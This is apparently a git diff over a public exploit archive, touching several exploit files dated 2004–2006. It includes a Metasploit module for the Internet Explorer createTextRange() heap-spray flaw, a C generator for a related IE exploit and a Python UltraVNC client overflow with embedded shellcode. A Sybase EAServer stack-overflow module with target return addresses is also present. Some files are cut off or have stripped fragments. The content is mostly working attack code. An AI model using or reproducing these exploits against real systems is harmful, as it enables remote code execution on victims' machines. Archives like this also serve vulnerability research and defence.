-	$os = 'Linux'     if $agent =~ /Linux/i;
-	$os = 'Mac OS X'  if $agent =~ /OS X/i;
-	$os = 'Windows'   if $agent =~ /Windows/i;
-
-	$self->PrintLine("[*] Client connected from $rhost:$rport ($os).");
-
-	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
-
-	$fd->Close();
-}
-
-sub JSUnescape {
-	my $self = shift;
-	my $data = shift;
-	my $code = '';
-
-	# Encode the shellcode via %u sequences for JS's unescape() function
-	my $idx = 0;
-	while ($idx < length($data) - 1) {
-		my $c1 = ord(substr($data, $idx, 1));
-		my $c2 = ord(substr($data, $idx+1, 1));
-		$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
-		$idx += 2;
-	}
-
-	return $code;
-}
-
-sub GenerateHTML {
-	my $self   = shift;
-	my $target = $self->Targets->[$self->GetVar('TARGET')];
-
-	my $shellcode    = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
-	my $nops         = $self->JSUnescape($self->MakeNops(4));
-	my $rnd          = int(rand(3));
-	my $inputtype    = (($rnd == 0) ? "checkbox" : (($rnd == 1) ? "radio" : "image"));
-	my $inp          = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $tmp          = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $payload      = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $nopslide     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $slidesize    = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $fillblock    = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $memblock     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $heap         = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $index        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $maxIndex     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $fillHeap     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $start        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	my $timer        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
-	$rnd             = int(rand(2));
-	my $setTimeout   =($rnd == 0) ? "setTimeout('$fillHeap()', 5);" : "";
-	my $setInterval  =($rnd == 1) ? "setInterval('$fillHeap()', 5);" : "";
-
-	my $data  = qq#
-
-
-	
-
-
-Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.
    
-In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.
    
-Progress: %
-
-
-#;
-}
-
-sub BuildResponse {
-	my ($self, $content) = @_;
-
-	my $response =
-	  "HTTP/1.1 200 OK\r\n" .
-	  "Content-Type: text/html\r\n";
-
-	if ($self->GetVar('Gzip')) {
-		$response .= "Content-Encoding: gzip\r\n";
-		$content = $self->Gzip($content);
-	}
-	if ($self->GetVar('Chunked')) {
-		$response .= "Transfer-Encoding: chunked\r\n";
-		$content = $self->Chunk($content);
-	} else {
-		$response .= 'Content-Length: ' . length($content) . "\r\n" .
-		  "Connection: close\r\n";
-	}
-
-	$response .= "\r\n" . $content;
-
-	return $response;
-}
-
-sub Chunk {
-	my ($self, $content) = @_;
-
-	my $chunked;
-	while (length($content)) {
-		my $chunk = substr($content, 0, int(rand(10) + 1), '');
-		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
-	}
-	$chunked .= "0\r\n\r\n";
-
-	return $chunked;
-}
-
-sub Gzip {
-	my $self = shift;
-	my $data = shift;
-	my $comp = int(rand(5))+5;
-
-	my($wtr, $rdr, $err);
-
-	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
-	print $wtr $data;
-	close ($wtr);
-	local $/;
-
-	return (<$rdr>);
-}
-1;
-
-# milw0rm.com [2006-04-01]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::ie_createtextrange;
+
+use strict;
+use base "Msf::Exploit";
+use Pex::Text;
+use IO::Socket::INET;
+use IPC::Open3;
+
+my $advanced =
+  {
+	'Gzip'       => [1, 'Enable gzip content encoding'],
+	'Chunked'    => [1, 'Enable chunked transfer encoding'],
+  };
+
+my $info =
+  {
+	'Name'           => 'Internet Explorer createTextRange() Code Execution',
+	'Version'        => '$Revision: 1.4 $',
+	'Authors'        =>
+	  [
+		'Faithless ',
+		'Darkeagle ',
+		'H D Moore ',
+		'',
+		'Anonymous',
+	  ],
+
+	'Description'    =>
+	  Pex::Text::Freeform(qq{
+		This module exploits a code execution vulnerability in Microsoft Internet Explorer.
+	Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory  in a way, which, under 
+	certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point
+	to a very remote, non-existent memory location. This module is the result of merging three
+	different exploit submissions and has only been reliably tested against Windows XP SP2.
+	This vulnerability was independently discovered by multiple parties. The heap spray method
+	used by this exploit was pioneered by Skylined.
+}),
+
+	'Arch'           => [ 'x86' ],
+	'OS'             => [ 'win32', 'winxp', 'win2003' ],
+	'Priv'           => 0,
+
+	'UserOpts'       =>
+	  {
+		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
+		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
+	  },
+
+	'Payload'        =>
+	  {
+		'Space'    => 1024,
+		'BadChars' => "\x00",
+		'Keys'     => ['-bind'],
+	  },
+	'Refs'           =>
+	  [
+		['OSVDB', '24050'],
+		['BID', '17196'],
+		['CVE', '2006-1359'],
+		['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'],
+		['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'],
+		['URL', 'http://www.kb.cert.org/vuls/id/876678'],
+		['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'],
+		['URL', 'http://www.shog9.com/crashIE.html'],
+	  ],
+
+	'DefaultTarget'  => 0,
+	'Targets'        =>
+	  [
+		[ 'Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)' ],
+		[ 'Internet Explorer 6 - (6.0.3790.0) -> 746F9468 (Windows XP SP2)' ],
+	  ],
+
+	'Keys'           => [ 'ie' ],
+
+	'DisclosureDate' => 'Mar 19 2006',
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit
+{
+	my $self = shift;
+	
+	if (! $self->InitNops(128)) {
+		$self->PrintLine("[*] Failed to initialize the NOP module.");
+		return;
+	}
+
+	my $server = IO::Socket::INET->new(
+		LocalHost => $self->GetVar('HTTPHOST'),
+		LocalPort => $self->GetVar('HTTPPORT'),
+		ReuseAddr => 1,
+		Listen    => 1,
+		Proto     => 'tcp'
+	  );
+	my $client;
+
+	# Did the listener create fail?
+	if (not defined($server)) {
+		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
+		return;
+	}
+
+	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
+	  Pex::Utils::SourceIP('1.2.3.4') :
+	  $self->GetVar('HTTPHOST');
+
+	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
+
+	while (defined($client = $server->accept())) {
+		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
+	}
+
+	return;
+}
+
+sub HandleHttpClient
+{
+	my $self = shift;
+	my $fd   = shift;
+
+	# Set the remote host information
+	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
+
+	# Read the HTTP command
+	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
+	my $agent;
+
+	# Read in the HTTP headers
+	while ((my $line = $fd->RecvLine(10))) {
+
+		$line =~ s/^\s+|\s+$//g;
+
+		my ($var, $val) = split(/\:/, $line, 2);
+
+		# Break out if we reach the end of the headers
+		last if (not defined($var) or not defined($val));
+
+		$agent = $val if $var =~ /User-Agent/i;
+	}
+
+	my $os = 'Unknown';
+
+	$os = 'Linux'     if $agent =~ /Linux/i;
+	$os = 'Mac OS X'  if $agent =~ /OS X/i;
+	$os = 'Windows'   if $agent =~ /Windows/i;
+
+	$self->PrintLine("[*] Client connected from $rhost:$rport ($os).");
+
+	my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
+
+	$fd->Close();
+}
+
+sub JSUnescape {
+	my $self = shift;
+	my $data = shift;
+	my $code = '';
+
+	# Encode the shellcode via %u sequences for JS's unescape() function
+	my $idx = 0;
+	while ($idx < length($data) - 1) {
+		my $c1 = ord(substr($data, $idx, 1));
+		my $c2 = ord(substr($data, $idx+1, 1));
+		$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
+		$idx += 2;
+	}
+
+	return $code;
+}
+
+sub GenerateHTML {
+	my $self   = shift;
+	my $target = $self->Targets->[$self->GetVar('TARGET')];
+
+	my $shellcode    = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload);
+	my $nops         = $self->JSUnescape($self->MakeNops(4));
+	my $rnd          = int(rand(3));
+	my $inputtype    = (($rnd == 0) ? "checkbox" : (($rnd == 1) ? "radio" : "image"));
+	my $inp          = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $tmp          = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $payload      = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $nopslide     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $slidesize    = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $fillblock    = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $memblock     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $heap         = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $index        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $maxIndex     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $fillHeap     = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $start        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	my $timer        = "_".Pex::Text::AlphaNumText(int(rand(6)+3));
+	$rnd             = int(rand(2));
+	my $setTimeout   =($rnd == 0) ? "setTimeout('$fillHeap()', 5);" : "";
+	my $setInterval  =($rnd == 1) ? "setInterval('$fillHeap()', 5);" : "";
+
+	my $data  = qq#
+
+
+	
+
+
+Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.
    
+In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.
    
+Progress: %
+
+
+#;
+}
+
+sub BuildResponse {
+	my ($self, $content) = @_;
+
+	my $response =
+	  "HTTP/1.1 200 OK\r\n" .
+	  "Content-Type: text/html\r\n";
+
+	if ($self->GetVar('Gzip')) {
+		$response .= "Content-Encoding: gzip\r\n";
+		$content = $self->Gzip($content);
+	}
+	if ($self->GetVar('Chunked')) {
+		$response .= "Transfer-Encoding: chunked\r\n";
+		$content = $self->Chunk($content);
+	} else {
+		$response .= 'Content-Length: ' . length($content) . "\r\n" .
+		  "Connection: close\r\n";
+	}
+
+	$response .= "\r\n" . $content;
+
+	return $response;
+}
+
+sub Chunk {
+	my ($self, $content) = @_;
+
+	my $chunked;
+	while (length($content)) {
+		my $chunk = substr($content, 0, int(rand(10) + 1), '');
+		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
+	}
+	$chunked .= "0\r\n\r\n";
+
+	return $chunked;
+}
+
+sub Gzip {
+	my $self = shift;
+	my $data = shift;
+	my $comp = int(rand(5))+5;
+
+	my($wtr, $rdr, $err);
+
+	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
+	print $wtr $data;
+	close ($wtr);
+	local $/;
+
+	return (<$rdr>);
+}
+1;
+
+# milw0rm.com [2006-04-01]
diff --git a/platforms/windows/remote/1628.cpp b/platforms/windows/remote/1628.cpp
index 1ec65c002..47e49ae17 100755
--- a/platforms/windows/remote/1628.cpp
+++ b/platforms/windows/remote/1628.cpp
@@ -1,114 +1,114 @@
-/*
-*
-* Internet Explorer "createTextRang" Download Shellcoded Exploit (2)
-* Bug discovered by Computer Terrorism (UK)
-* http://www.computerterrorism.com/research/ct22-03-2006
-*
-* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
-* Severity: Critical
-* Impact: Remote System Access
-* Solution Status: Unpatched
-*
-* E-Mail: atmaca@icqmail.com
-* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
-* Credit to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene
-*
-*/
-
-/*
-*
-* This one is more faster than all released createTextRange exploits
-* because it uses last version of SkyLined's heap spraying code,
-* special 10x goes to him.
-*
-*/
-
-#include 
-#include 
-
-#define BUF_LEN         0x800
-#define FILE_NAME       "index.htm"
-
-char body1[] =
-	"\r\n"
-	"";
-
-
-int main(int argc,char *argv[])
-{
-        if (argc < 2)
-        {
-                printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)");
-				printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n");
-                printf("\nUsage:\n");
-                printf("ie_exp \n");
-
-                return 0;
-        }
-
-        FILE *File;
-        char *pszBuffer;
-        char *web = argv[1];
-        char *pu = "%u";
-        char u_t[5];
-        char *utf16 = (char*)malloc(strlen(web)*5);
-
-        if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
-                printf("\n [Err:] fopen()");
-                exit(1);
-        }
-
-        pszBuffer = (char*)malloc(BUF_LEN);
-        memcpy(pszBuffer,body1,sizeof(body1)-1);
-
-        memset(utf16,'\0',strlen(web)*5);
-        for (unsigned int i=0;i
+#include 
+
+#define BUF_LEN         0x800
+#define FILE_NAME       "index.htm"
+
+char body1[] =
+	"\r\n"
+	"";
+
+
+int main(int argc,char *argv[])
+{
+        if (argc < 2)
+        {
+                printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)");
+				printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n");
+                printf("\nUsage:\n");
+                printf("ie_exp \n");
+
+                return 0;
+        }
+
+        FILE *File;
+        char *pszBuffer;
+        char *web = argv[1];
+        char *pu = "%u";
+        char u_t[5];
+        char *utf16 = (char*)malloc(strlen(web)*5);
+
+        if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
+                printf("\n [Err:] fopen()");
+                exit(1);
+        }
+
+        pszBuffer = (char*)malloc(BUF_LEN);
+        memcpy(pszBuffer,body1,sizeof(body1)-1);
+
+        memset(utf16,'\0',strlen(web)*5);
+        for (unsigned int i=0;i;
                 select(STDOUT);         close(S);
                 return @in;
-        } else { die("[-] Can't connect...\n"); }}
-
-# milw0rm.com [2004-03-26]
+        } else { die("[-] Can't connect...\n"); }}
+
+# milw0rm.com [2004-03-26]
diff --git a/platforms/windows/remote/1664.py b/platforms/windows/remote/1664.py
index 31cef41b1..8ae997e06 100755
--- a/platforms/windows/remote/1664.py
+++ b/platforms/windows/remote/1664.py
@@ -1,57 +1,57 @@
-#!/usr/bin/python
-
-#Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemm
-#POC by Paul Haas at Redspin.com
-#Tested on WinXP SP 2: Launches Calc
-import socket, struct
-
-HOST = ''                       # Localhost
-PORT = 5900                     # VNC Server
-BOFSZ = 1024                    # Buffer Size
-HEAD = "RFB 003.006\n"          # VNC Header
-MESSAGE = "Requires Ultr@VNC Authentication\n"
-NOP = "\x90"                    # Standard x86 NOP
-JMP = "\xE9\x1B\xFC\xFF\xFF"    # JMP To BUFF
-ESP = "\xE0\x3A\xB4\x76"        # winmm.dll: JMP %esp
-POP = "PASSWORD"                # RET 8
-
-# win32_exec - CMD=calc Size=160 http://metasploit.com
-SHELLCODE = \
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe1"+\
-"\x7c\x05\xd9\x83\xeb\xfc\xe2\xf4\x1d\x94\x41\xd9\xe1\x7c\x8e\x9c"+\
-"\xdd\xf7\x79\xdc\x99\x7d\xea\x52\xae\x64\x8e\x86\xc1\x7d\xee\x90"+\
-"\x6a\x48\x8e\xd8\x0f\x4d\xc5\x40\x4d\xf8\xc5\xad\xe6\xbd\xcf\xd4"+\
-"\xe0\xbe\xee\x2d\xda\x28\x21\xdd\x94\x99\x8e\x86\xc5\x7d\xee\xbf"+\
-"\x6a\x70\x4e\x52\xbe\x60\x04\x32\x6a\x60\x8e\xd8\x0a\xf5\x59\xfd"+\
-"\xe5\xbf\x34\x19\x85\xf7\x45\xe9\x64\xbc\x7d\xd5\x6a\x3c\x09\x52"+\
-"\x91\x60\xa8\x52\x89\x74\xee\xd0\x6a\xfc\xb5\xd9\xe1\x7c\x8e\xb1"+\
-"\xdd\x23\x34\x2f\x81\x2a\x8c\x21\x62\xbc\x7e\x89\x89\x8c\x8f\xdd"+\
-"\xbe\x14\x9d\x27\x6b\x72\x52\x26\x06\x1f\x64\xb5\x82\x7c\x05\xd9"
-
-#buff = MESSAGE+SHELLCODE+NOP SLED+RET ADDR+USELESS+JUMP TO BUFF
-buff = MESSAGE+SHELLCODE+NOP*(BOFSZ-11-len(MESSAGE)-len(SHELLCODE))
-buff = buff+ESP+POP+JMP
-
-#Egg = VNC Server Error Reply and Size of Reply + buff
-egg = struct.pack('LL',socket.htonl(0),socket.htonl(len(buff)))+buff
-
-print 'Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemma'
-print 'POC by Paul Haas at Redspin.com'
-print 'Server listening on port', PORT
-
-#Server Loop
-while(1):
-       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-       s.bind((HOST, PORT))
-       s.listen(1)
-
-       conn, addr = s.accept()
-       print 'Connection by', addr
-
-       conn.send(HEAD)
-       data = conn.recv(12)
-
-       conn.send(egg)
-       conn.close()
-
-# milw0rm.com [2006-04-11]
+#!/usr/bin/python
+
+#Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemm
+#POC by Paul Haas at Redspin.com
+#Tested on WinXP SP 2: Launches Calc
+import socket, struct
+
+HOST = ''                       # Localhost
+PORT = 5900                     # VNC Server
+BOFSZ = 1024                    # Buffer Size
+HEAD = "RFB 003.006\n"          # VNC Header
+MESSAGE = "Requires Ultr@VNC Authentication\n"
+NOP = "\x90"                    # Standard x86 NOP
+JMP = "\xE9\x1B\xFC\xFF\xFF"    # JMP To BUFF
+ESP = "\xE0\x3A\xB4\x76"        # winmm.dll: JMP %esp
+POP = "PASSWORD"                # RET 8
+
+# win32_exec - CMD=calc Size=160 http://metasploit.com
+SHELLCODE = \
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe1"+\
+"\x7c\x05\xd9\x83\xeb\xfc\xe2\xf4\x1d\x94\x41\xd9\xe1\x7c\x8e\x9c"+\
+"\xdd\xf7\x79\xdc\x99\x7d\xea\x52\xae\x64\x8e\x86\xc1\x7d\xee\x90"+\
+"\x6a\x48\x8e\xd8\x0f\x4d\xc5\x40\x4d\xf8\xc5\xad\xe6\xbd\xcf\xd4"+\
+"\xe0\xbe\xee\x2d\xda\x28\x21\xdd\x94\x99\x8e\x86\xc5\x7d\xee\xbf"+\
+"\x6a\x70\x4e\x52\xbe\x60\x04\x32\x6a\x60\x8e\xd8\x0a\xf5\x59\xfd"+\
+"\xe5\xbf\x34\x19\x85\xf7\x45\xe9\x64\xbc\x7d\xd5\x6a\x3c\x09\x52"+\
+"\x91\x60\xa8\x52\x89\x74\xee\xd0\x6a\xfc\xb5\xd9\xe1\x7c\x8e\xb1"+\
+"\xdd\x23\x34\x2f\x81\x2a\x8c\x21\x62\xbc\x7e\x89\x89\x8c\x8f\xdd"+\
+"\xbe\x14\x9d\x27\x6b\x72\x52\x26\x06\x1f\x64\xb5\x82\x7c\x05\xd9"
+
+#buff = MESSAGE+SHELLCODE+NOP SLED+RET ADDR+USELESS+JUMP TO BUFF
+buff = MESSAGE+SHELLCODE+NOP*(BOFSZ-11-len(MESSAGE)-len(SHELLCODE))
+buff = buff+ESP+POP+JMP
+
+#Egg = VNC Server Error Reply and Size of Reply + buff
+egg = struct.pack('LL',socket.htonl(0),socket.htonl(len(buff)))+buff
+
+print 'Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemma'
+print 'POC by Paul Haas at Redspin.com'
+print 'Server listening on port', PORT
+
+#Server Loop
+while(1):
+       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+       s.bind((HOST, PORT))
+       s.listen(1)
+
+       conn, addr = s.accept()
+       print 'Connection by', addr
+
+       conn.send(HEAD)
+       data = conn.recv(12)
+
+       conn.send(egg)
+       conn.close()
+
+# milw0rm.com [2006-04-11]
diff --git a/platforms/windows/remote/168.c b/platforms/windows/remote/168.c
index 7be51bcd5..81b6ae45a 100755
--- a/platforms/windows/remote/168.c
+++ b/platforms/windows/remote/168.c
@@ -292,6 +292,6 @@ fprintf (stderr, "# done.\n");
 fprintf (stderr, "# make sure we are in, dude :)\n\n");
 
 return 0;
-}
-
-// milw0rm.com [2004-03-28]
+}
+
+// milw0rm.com [2004-03-28]
diff --git a/platforms/windows/remote/1681.pm b/platforms/windows/remote/1681.pm
index f82f549f1..39d52446f 100755
--- a/platforms/windows/remote/1681.pm
+++ b/platforms/windows/remote/1681.pm
@@ -1,127 +1,127 @@
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::sybase_easerver;
-use strict;
-use base "Msf::Exploit";
-use Pex::Text;
-
-my $advanced = { };
-
-my $info =
-  {
-	'Name'  => 'Sybase EAServer 5.2 Remote Stack Overflow',
-	'Version'  => '$Revision: 1.4 $',
-	'Authors' => [ 'anonymous' ],
-	'Arch'  => [ 'x86' ],
-	'OS'    => [ 'win32', 'winxp', 'win2k', 'win2003' ],
-	'Priv'  => 1,
-
-	'AutoOpts'  =>
-	  {
-		'EXITFUNC' => 'thread'
-	  },
-
-	'UserOpts'  =>
-	  {
-		'RHOST' => [1, 'ADDR', 'The target address'],
-		'RPORT' => [1, 'PORT', 'The target port', 8080 ],
-		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
-		'DIR'   => [1, 'DATA', 'Directory of Login.jsp script', '/WebConsole/'],
-		'SSL'   => [0, 'BOOL', 'Use SSL'],
-	  },
-
-	'Payload' =>
-	  {
-		'Space'     => 1000,
-		'BadChars'  => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
-		'Prepend'	=> "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy
-		'Keys' 	    => ['+ws2ord'],
-	  },
-
-	'Description'  => Pex::Text::Freeform(qq{
-		This module exploits a stack overflow in the Sybase EAServer Web
-        Console. The offset to the SEH frame appears to change depending
-		on what version of Java is in use by the remote server, making this
-		exploit somewhat unreliable.
-}),
-
-	'Refs'  =>
-	  [
-		['BID', 14287],
-	  ],
-
-	'Targets' =>
-	  [
-	  	# Technically we could combine these into a single multi-return string...
-		[ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', 0x6d4548ff, 3820],
-		[ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?',  0x6d4548ff, 3841],
-		[ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', 0x08041b25, 3912],
-		[ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', 0x08041b25, 3925],
-	  ],
-
-	'Keys'  => ['easerver'],
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit {
-	my $self        = shift;
-	my $target_host = $self->GetVar('RHOST');
-	my $target_port = $self->GetVar('RPORT');
-	my $target_idx  = $self->GetVar('TARGET');
-	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
-	my $dir         = $self->GetVar('DIR');
-	my $target      = $self->Targets->[$target_idx];
-
-	$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
-
-	my $s = Msf::Socket::Tcp->new(
-		'PeerAddr'  => $target_host,
-		'PeerPort'  => $target_port,
-		'SSL'      => $self->GetVar('SSL'),
-	  );
-
-	if ( $s->IsError ) {
-		$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
-		return;
-	}
-
-
-	my $crash = Pex::Text::AlphaNumText(5000);
-	
-	substr($crash, $target->[2] - 4, 2, "\xeb\x06");	
-	substr($crash, $target->[2]    , 4, pack("V", $target->[1]));
-	substr($crash, $target->[2] + 4, length($shellcode), $shellcode);
-	
-	$dir = $dir . "Login.jsp?" . $crash;
-
-	my $request =
-	  "GET $dir HTTP/1.1\r\n".
-	  "Accept: */*\r\n".
-	  "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
-	  "Host: $target_host:$target_port\r\n".
-	  "Connection: Close\r\n".
-	  "\r\n";
-
-	$s->Send($request);
-
-	$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
-	select(undef, undef, undef, 4);
-
-	$self->Handler($s);
-	return;
-}
-
-1;
-
-# milw0rm.com [2006-04-15]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::sybase_easerver;
+use strict;
+use base "Msf::Exploit";
+use Pex::Text;
+
+my $advanced = { };
+
+my $info =
+  {
+	'Name'  => 'Sybase EAServer 5.2 Remote Stack Overflow',
+	'Version'  => '$Revision: 1.4 $',
+	'Authors' => [ 'anonymous' ],
+	'Arch'  => [ 'x86' ],
+	'OS'    => [ 'win32', 'winxp', 'win2k', 'win2003' ],
+	'Priv'  => 1,
+
+	'AutoOpts'  =>
+	  {
+		'EXITFUNC' => 'thread'
+	  },
+
+	'UserOpts'  =>
+	  {
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 8080 ],
+		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
+		'DIR'   => [1, 'DATA', 'Directory of Login.jsp script', '/WebConsole/'],
+		'SSL'   => [0, 'BOOL', 'Use SSL'],
+	  },
+
+	'Payload' =>
+	  {
+		'Space'     => 1000,
+		'BadChars'  => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
+		'Prepend'	=> "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy
+		'Keys' 	    => ['+ws2ord'],
+	  },
+
+	'Description'  => Pex::Text::Freeform(qq{
+		This module exploits a stack overflow in the Sybase EAServer Web
+        Console. The offset to the SEH frame appears to change depending
+		on what version of Java is in use by the remote server, making this
+		exploit somewhat unreliable.
+}),
+
+	'Refs'  =>
+	  [
+		['BID', 14287],
+	  ],
+
+	'Targets' =>
+	  [
+	  	# Technically we could combine these into a single multi-return string...
+		[ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', 0x6d4548ff, 3820],
+		[ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?',  0x6d4548ff, 3841],
+		[ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', 0x08041b25, 3912],
+		[ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', 0x08041b25, 3925],
+	  ],
+
+	'Keys'  => ['easerver'],
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit {
+	my $self        = shift;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $dir         = $self->GetVar('DIR');
+	my $target      = $self->Targets->[$target_idx];
+
+	$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
+
+	my $s = Msf::Socket::Tcp->new(
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'SSL'      => $self->GetVar('SSL'),
+	  );
+
+	if ( $s->IsError ) {
+		$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
+		return;
+	}
+
+
+	my $crash = Pex::Text::AlphaNumText(5000);
+	
+	substr($crash, $target->[2] - 4, 2, "\xeb\x06");	
+	substr($crash, $target->[2]    , 4, pack("V", $target->[1]));
+	substr($crash, $target->[2] + 4, length($shellcode), $shellcode);
+	
+	$dir = $dir . "Login.jsp?" . $crash;
+
+	my $request =
+	  "GET $dir HTTP/1.1\r\n".
+	  "Accept: */*\r\n".
+	  "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
+	  "Host: $target_host:$target_port\r\n".
+	  "Connection: Close\r\n".
+	  "\r\n";
+
+	$s->Send($request);
+
+	$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
+	select(undef, undef, undef, 4);
+
+	$self->Handler($s);
+	return;
+}
+
+1;
+
+# milw0rm.com [2006-04-15]
diff --git a/platforms/windows/remote/1703.pl b/platforms/windows/remote/1703.pl
index b905f85c8..52db8b58d 100755
